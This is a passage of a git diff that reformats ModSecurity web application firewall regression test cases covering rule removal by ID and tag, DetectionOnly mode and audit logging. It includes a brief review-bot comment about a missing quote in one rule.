200, + "parser_error": "Invalid input: SecUnicodeMapFile does-not-exist-unicode.mapping eita" }, "rules": [ "SecRuleEngine On", 
@@ -57,8 +138,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -68,25 +149,27 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { @@ -115,8 +198,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -126,25 +209,27 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { diff --git a/test/test-cases/regression/issue-1943.json b/test/test-cases/regression/issue-1943.json index 7dd688d556..7a7e4b64b3 100644 --- a/test/test-cases/regression/issue-1943.json +++ b/test/test-cases/regression/issue-1943.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -26,25 +26,27 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { @@ -72,8 +74,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -83,29 +85,30 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "debug_log": "", "http_code": 200 }, "rules": [ diff --git a/test/test-cases/regression/issue-1956.json b/test/test-cases/regression/issue-1956.json index ead45da2a0..97315d3fcc 100644 --- a/test/test-cases/regression/issue-1956.json +++ b/test/test-cases/regression/issue-1956.json 
@@ -1,190 +1,210 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 1", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 1", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913104 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913104,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 2", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 2", + "url": 
"https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913104 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913104\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913104,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 3", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 3", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, 
"expected": { - "audit_log": "", "debug_log": "Rule id: 913103 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913103,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 4", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 4", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913105 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913105,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 5", - "url": 
"https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 5", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule: 913102. Executing operator", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913102,phase:request,pass,nolog,t:none,msg:'whee'\"" ] diff --git a/test/test-cases/regression/issue-1960.json b/test/test-cases/regression/issue-1960.json index 5b288977cd..cdda24f54e 100644 --- a/test/test-cases/regression/issue-1960.json +++ b/test/test-cases/regression/issue-1960.json 
@@ -1,37 +1,40 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleEngine DetectionOnly with disruptive SecDefaultAction", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleEngine DetectionOnly with disruptive SecDefaultAction", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ + "request": { + "headers": { "Host": "localhost" }, - "uri":"?a=a", - "method":"GET" + "uri": "?a=a", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecDefaultAction \"phase:1,deny,status:403\"", "SecRule ARGS \"@rx a\" \"id:1,phase:1,block" diff --git a/test/test-cases/regression/issue-2000.json b/test/test-cases/regression/issue-2000.json index 05610b457d..43a89a4dc8 100644 --- a/test/test-cases/regression/issue-2000.json +++ b/test/test-cases/regression/issue-2000.json 
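Review bot: The last rule in the issue-1960.json hunk, `"SecRule ARGS \"@rx a\" \"id:1,phase:1,block"`, has no closing `\"` on its action list, so the directive the parser receives ends in an unbalanced quote. The case expects `http_code` 200 under `SecRuleEngine DetectionOnly`; if the rule is rejected or parsed differently from what was meant, that 200 can be reached without `block` ever being evaluated, and the case no longer shows that DetectionOnly suppresses the disruptive default action. How the parser treats the missing quote is not visible here, so it is worth confirming in the debug log that rule 1 actually matches. Suggested line: `"SecRule ARGS \"@rx a\" \"id:1,phase:1,block\""`. This is a context line at the end of the hunk, and the rest of the `rules` array lies outside it.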
@@ -1,35 +1,41 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing audit log part H should output when deny - issue-2000", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing audit log part H should output when deny - issue-2000", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"index.php?foo=bar&a=xxx", - "method":"GET", - "body": "" - }, - "expected": { - "http_code": 403, - "audit_log": "id \"1234" + "uri": "index.php?foo=bar&a=xxx", + "method": "GET", + "body": [ + "" + ] }, + "response": { + "headers": { - "server":{ - "ip":"127.0.0.1", - "port":80 + }, + "body": [ + "" + ] + }, + "expected": { + "audit_log": "id \"1234", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAuditLogParts ABIJDEFHZ", "SecAuditEngine RelevantOnly", diff --git a/test/test-cases/regression/issue-2099.json b/test/test-cases/regression/issue-2099.json index fff4aa4cc8..7df0c1da9c 100644 --- a/test/test-cases/regression/issue-2099.json +++ b/test/test-cases/regression/issue-2099.json 
@@ -1,195 +1,254 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/remote.php/webdav?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", - "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" + "uri": "/remote.php/webdav?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", + "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - 
"request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById against - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/remote.php?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/remote.php?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", - "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", + "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag - issue 2099", + "client": { + "ip": 
"200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/remote.php/webdav?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", - "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/remote.php/webdav?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", + "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag against - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/remote.php?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - 
"ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", - "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/remote.php?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", + "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveTargetByTag - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"1.2.3.4", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveTargetByTag - issue 2099", + "client": { + "ip": "1.2.3.4", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/test.php?a=a", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/test.php?a=a", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_URI \"@contains /test.php\" 
\"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", - "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", + "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveTargetByTag against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"1.2.3.4", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveTargetByTag against - issue 2099", + "client": { + "ip": "1.2.3.4", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/index.php?a=a", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", - "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/index.php?a=a", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule 
REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", + "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] - } + } ] - diff --git a/test/test-cases/regression/issue-2111.json b/test/test-cases/regression/issue-2111.json index c3faa7d216..5383cdd06a 100644 --- a/test/test-cases/regression/issue-2111.json +++ b/test/test-cases/regression/issue-2111.json @@ -1,33 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById with range - issue 1444", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById with range - issue 1444", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"index.php?foo=bar&z=xxx", - "method":"GET", - "body": "" + "uri": "index.php?foo=bar&z=xxx", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"127.0.0.1", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:foo \"@rx ^bar$\" \"id:100,phase:1,ctl:ruleRemoveById=200-1999\"", - "SecRule ARGS:z \"@rx ^xxx$\" \"id:1010,phase:1,deny,status:403\"" + "rules": [ + "SecRuleEngine On", + 